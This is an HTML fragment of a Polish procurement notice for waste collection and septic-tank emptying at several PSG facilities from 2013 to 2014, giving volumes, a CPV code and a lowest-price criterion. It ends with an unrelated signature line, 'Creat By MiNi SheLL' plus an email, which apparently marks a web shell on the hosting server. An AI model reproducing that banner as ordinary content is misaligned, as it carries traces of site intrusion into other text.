b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 12m3 
z 1 szt. pojemnika o pojemności 1100 l, będącego własnością Zamawiającego ustawionego na terenie obiektu PSG. 
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a)odpady komunalne zbierane w sposób selektywny: 3 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 6 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 1,00 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Odbiór stałych odpadów komunalnych z PSG w Bohukałach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w m. Bohukały 33 w terminie od 01.07.2013 r.
do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 16m3
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 16m3
z 1 szt. pojemnika o pojemności 1100l, będącego własnością Zamawiającego ustawionego na terenie obiektu PSG w Bohukałach.
2. Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a)odpady komunalne zbierane w sposób selektywny: 4 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 8 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 1,33 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Odbiór stałych odpadów komunalnych z PSG w Terespolu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w m. Terespol, ul. Wojska Polskiego 164 w terminie
od 01.07.2013 r. do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 45m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 45m3 
z 2 szt. kontenerów KP-7, będących własnością Zamawiającego ustawionych
na terenie PSG.
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a)odpady komunalne zbierane w sposób selektywny: 10 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 22,5m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 3,75 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Odbiór stałych odpadów komunalnych z PSG w Zbereżu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w m. Zbereże nr 30 w terminie od 01.07.2013 r.
do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 7 m3 
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 7 m3 
z 1 szt. pojemnika o pojemności 1100 l, będącego własnością Zamawiającego ustawionego na terenie PSG. 
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a)odpady komunalne zbierane w sposób selektywny: 1,5 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 3,5 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 0,58 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Odbiór stałych odpadów komunalnych z PSG w Lublinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w m. Lublin, ul. Podwale 3a w terminie od 01.07.2013 r.
do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 5m3 ,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 5m3 
z pojemników niebędących własnością Zamawiającego które będą ustawione na terenie PSG. 
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a)odpady komunalne zbierane w sposób selektywny: 1 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 2,5 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia:
a)segregowanych odpadów komunalnych o łącznej pojemności ok. 0,42m3 
b)zmieszanych odpadów komunalnych o łącznej pojemności ok. 0,42m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Odbiór nieczystości płynnych z PSG w Dołhobrodach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na opróżnieniu zbiorników bezodpływowych na nieczystości płynne (szambo) w ilości szacunkowej 256m3 z PSG
w Dołhobrodach 58A w terminie od 01.07.2013 r. do 30.06.2014 r.
2.Zamawiający zobowiązuje się do przekazania min. ilości co najmniej 100 m3 wytworzonych nieczystości płynnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Odbiór nieczystości płynnych z PSG w Kryłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa, polegająca na opróżnieniu zbiorników bezodpływowych na nieczystości płynne (szambo) w ilości szacunkowej 1 390 m3 znajdującego się na terenie PSG w Kryłowie przy ul. Hrubieszowskiej 7 w terminie
od 01.07.2013 r. do 30.06.2014 r.
2.Zamawiający zobowiązuje się do przekazania min. ilości co najmniej 600 m3 wytworzonych nieczystości płynnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com